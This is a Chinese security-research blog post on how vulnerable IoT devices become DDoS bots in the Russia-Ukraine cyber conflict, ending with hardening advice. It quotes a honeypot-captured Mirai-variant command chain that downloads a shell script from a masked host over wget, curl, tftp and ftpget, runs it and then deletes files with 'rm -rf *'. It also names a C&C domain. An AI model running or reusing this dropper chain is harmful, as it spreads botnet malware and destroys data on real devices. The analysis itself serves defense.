安全研究 | 如何避免IOT设备成为网络武器

导文

在3月11日发布的俄乌网络战攻击技术分析文章中，我们统计并分析了俄罗斯和乌克兰之间的网络战所使用的技术手段。本文将结合长扬捕获到的恶意样本，进行实际结合分析阐述。我们注意到一个问题：谁在为这场网络冲突提供肉鸡？最不起眼的设备就是网络战中的帮凶。

首先读者需要了解什么是网络攻击最常见的手段。最简单的理解就是“饥饿营销”，当网站整点发放商品时，同时几万人在线抢购会导致网站崩溃以及用户无法正常访问。这个行为其实已经构成了一种网络攻击行为，在安全领域里统称DDOS。

2022 年 3 月 29 日，在乌克兰全国范围内，一场大规模的网络攻击对国家供应商 Ukrtelecom 造成了严重的互联网中断。根据全球互联网监控服务 NetBlock的数据实时网络数据流量显示，网络连接由80%左右下降到13%。

我们再根据俄罗斯和乌克兰双方支持组织的攻击类型进行分类对比发现，参与网络战的76个(明确支持一方)组织中，其中有51个支持乌克兰，25个支持俄罗斯。

乌克兰支持组织中，使用DDOS攻击的为18/51；俄罗斯支持组织中，使用DDOS攻击的为7/25。

从数据结果来看，双方的DDOS手段占比非常之高。在乌克兰的官方平台显示的30万人中，很大一部分人员都是采用的DDOS的攻击形式，而这种攻击形式只是针对某一个IP或者某一个网站进行，而要想实现文章中开头出现的国家断网事件，需要大量的傀儡主机。这种傀儡主机的主要来源主要是通过IOT设备的漏洞开启Telnet访问，或者通过弱口令进行SSH远程访问种植木马来实现。我们来看下面两组数据：

1.自2022年3月26日至4月1日统计的Telnet攻击数据：

2.自2022年3月26日至4月1日统计的SSH攻击数据：

从蜜罐中捕获到的样本执行脚本中发现，当捕获到批量扫描器对部署的设备进行攻击时，会通过多种不同的形式进行下载执行DDOS下载器：

cd /; wget http://x.x.x.x/76d32bXX.sh; curl -O http://x.x.x.x/76d32bXX.sh; chmod 777 76d32bXX.sh; sh 76d32bXX.sh; tftp x.x.x.x -c get 76d32bXX.sh; chmod 777 76d32bXX.sh; sh 76d32bXX.sh; tftp -r 76d32beXX.sh -g x.x.x.x; chmod 777 76d32beXX.sh; sh 76d32beXX.sh; ftpget -v -u anonymous -p anonymous -P 21 x.x.x.x 76d32beXX.sh 76d32beXX.sh; sh 76d32beXX.sh; rm -rf 76d32bXX.sh 76d32bXX.sh 76d32beXX.sh 76d32beXX.sh; rm -rf *

对目标中被种植的恶意下载器进行逆向分析，提取出了大量的恶意DDOS程序，几乎涵盖了所有易受攻击的IOT与路由设备的平台。

将该样本通过virustotal进行扫描后，发现是属于Mirai家族的新变种，C&C控制地址为jswl.jdaili.xyz。Mirai家族主要利用了IP安全摄像头、路由器和dvr等设备进行传播。

随着国内IOT基础建设的普及，应积极做好IOT设备的安全防护。IOT设备的固件漏洞修复方式复杂，往往使漏洞不能及时更新补丁，这就会直接导致IOT设备更加容易沦为DDOS的攻击傀儡机。

总结

长扬科技安全研究院建议：为了使IOT设备更加安全，可以采取以下操作来减少IOT设备被恶意入侵的风险。

建议1：禁止向互联网开放IOT管理权限，同时增强IOT设备管理员密码的复杂度。

建议2：加强IOT设备的安全建设，可部署入侵防御系统来进行从流量层面防范针对HTTP和DDOS攻击。

建议3：加强IOT设备的漏洞管理，官方出现新的补丁时，及时更新安装，修复漏洞，定时重启设备。